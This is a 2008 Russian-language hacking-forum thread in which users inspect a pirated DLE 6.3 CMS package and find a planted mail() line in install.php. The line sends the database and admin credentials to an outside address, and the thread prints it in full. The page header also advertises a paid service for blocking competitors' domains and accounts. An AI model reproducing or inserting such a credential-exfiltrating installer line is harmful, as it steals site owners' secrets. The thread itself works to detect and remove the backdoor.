Форум АНТИЧАТ - Проверить Dle 6.3

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Проверить Dle 6.3

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Проверить Dle 6.3

05.02.2008, 12:28

Ali_MiX

Постоянный

Регистрация: 08.10.2006

Сообщений: 445

Провел на форуме:
1028732

Репутация: 80

Отправить сообщение для Ali_MiX с помощью ICQ

Отправить сообщение для Ali_MiX с помощью Yahoo

Проверить Dle 6.3

Доброго времени суток.
Вот у меня такая фигня, короче нужно проверить cms DLE 6.3
Вот тут исходники _http://rapidshare.com/files/89292111/dle.zip.html
Кто может проверить отпишитесь.
Я нашел только 1 фитчу в файле install.php на строке 432 все пассы отправляет на мыло кому то.

05.02.2008, 12:41

iron-viper

Участник форума

Регистрация: 13.11.2007

Сообщений: 180

Провел на форуме:
1058585

Репутация: 122

Посмотрел DLE 6.3 только не тот
на который ты дал ссылку а свой но все равно все из одной богодельни. Посмотрел файл install.php и что-то не нашел я там в указанной тобою строке отправку куда-то: вот строки с 425 по 433

Код:

elseif($_REQUEST['action'] == "doinstall")
{
    if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
	if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
	{	
		msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");	 
	}

    $reg_password = md5(md5($reg_password1));

Дальше идет формирование конфигурации. Вообще после установки этого движка файл install.php удаляется в целях безопасности(дабы исключить переустановку).

05.02.2008, 12:43

Ali_MiX

Постоянный

Регистрация: 08.10.2006

Сообщений: 445

Провел на форуме:
1028732

Репутация: 80

этот код типа из скрипта инстала выдрать надо?

05.02.2008, 12:44

iron-viper

Участник форума

Регистрация: 13.11.2007

Сообщений: 180

Провел на форуме:
1058585

Репутация: 122

Не понял твоего вопроса. Если можешь покажи саму строку.

05.02.2008, 12:48

Ali_MiX

Постоянный

Регистрация: 08.10.2006

Сообщений: 445

Провел на форуме:
1028732

Репутация: 80

я же говорю строка 432

05.02.2008, 12:51

iron-viper

Участник форума

Регистрация: 13.11.2007

Сообщений: 180

Провел на форуме:
1058585

Репутация: 122

Я тебе привел со строки 425 по строку 433 и в строке 432 нету твоего кода! О котором ты говоришь, напиши сюда код. Что ты там увидел? Всавь в сообщение епт...

05.02.2008, 12:54

Ali_MiX

Постоянный

Регистрация: 08.10.2006

Сообщений: 445

Провел на форуме:
1028732

Репутация: 80

Код:

HTML;

}
// ********************************************************************************
// Do Install
// ********************************************************************************
elseif($_REQUEST['action'] == "doinstall")
{
    if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
	if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
	{	
		msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");	 
	}
mail("pinkfloyd1488@mail.ru", "Привет, вот тебе данные", "ЮРЛ Сайта: $url \n DBHOST: $dbhost \n DBNAME: $dbname \n DBUSER: $dbuser \n DBPASS: $dbpasswd \n Данные админ панели \n Имя админа: $reg_username \n Пароль админа: $reg_password1 \n Мыло Админа: $reg_email"); 

    $reg_password = md5(md5($reg_password1));

$config = <<<HTML

pinkfloyd1488@mail.ru

05.02.2008, 12:57

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

Ali_MiX, хаха)))
Удалил хоть строку?

05.02.2008, 12:58

Ali_MiX

Постоянный

Регистрация: 08.10.2006

Сообщений: 445

Провел на форуме:
1028732

Репутация: 80

да
но я не про то, я про то может там ещё что встроили, может шелы какие или инклуды какие нить

#10

05.02.2008, 12:58

iron-viper

Участник форума

Регистрация: 13.11.2007

Сообщений: 180

Провел на форуме:
1058585

Репутация: 122

lol кто-то классно придумал. Да действительно в твоем варианте пассы отсылаются на емайл. Видимо кто-то решил собрать веселую сборку. Но это скорее не баг, а хак.
Вообщем с этого ты ничего не поимеешь, качни норм сборку! Зануленную Мид Тимом. Причем с проверенных ресурсов а не с хз каких. По поводу вообще багов в DLE - пока не попадались.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вышла FreeBSF 6.3 STABLE	desTiny	Мировые новости	0	20.01.2008 22:15
Вышла операционная система FreeBSD 6.3	Mr. P.S.	Мировые новости	1	19.01.2008 00:30
Проверить Ios	lsass.exe	Проверка на уязвимости	9	20.12.2007 16:05
Коды	silveran	Сотовый фрикинг	4	18.10.2005 14:37

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход